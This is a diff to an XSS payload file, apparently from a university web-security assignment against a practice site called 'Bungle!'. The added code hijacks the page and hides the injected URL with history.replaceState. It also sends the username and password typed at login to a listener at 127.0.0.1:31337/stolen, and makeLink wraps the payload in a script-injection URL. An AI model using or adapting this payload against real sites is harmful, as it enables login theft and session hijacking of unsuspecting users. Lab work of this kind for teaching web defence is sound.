--- a/PA2/xss_payload.html
+++ b/PA2/xss_payload.html
@@ -11,19 +11,26 @@ function payload(attacker) {
         $("html").load(href, function(){
             $("html").show();
             log({event: "nav", uri: href});
-            $("#query").val("pwned!");
+            window.history.replaceState('', "Bungle!","./search");
         });
     }
+    $("#search-btn").click(function(){
+       window.history.replaceState('', "Bungle!","./search");
+    });
     $("html").hide();
+    $("#log-in-btn").click(function(){
+        $.get("http://127.0.0.1:31337/stolen?even=login&user=" + $("#username").val() + "&pass=" + $("#userpass").val());
+    });
     proxy("./");
+
 }
 function makeLink(xssdefense, target, attacker) {
     if (xssdefense == 0) {
-    return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
-    encodeURIComponent("<script" + ">" + payload.toString() +
-    ";payload(\"" + attacker + "\");</script" + ">");
+        return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
+        encodeURIComponent("<script" + ">" + payload.toString() +
+        ";payload(\"" + attacker + "\");</script" + ">");
     } else {
-    // Implement code to defeat XSS defenses here.
+        // Implement code to defeat XSS defenses here.
     }
 }
 var xssdefense = 0;
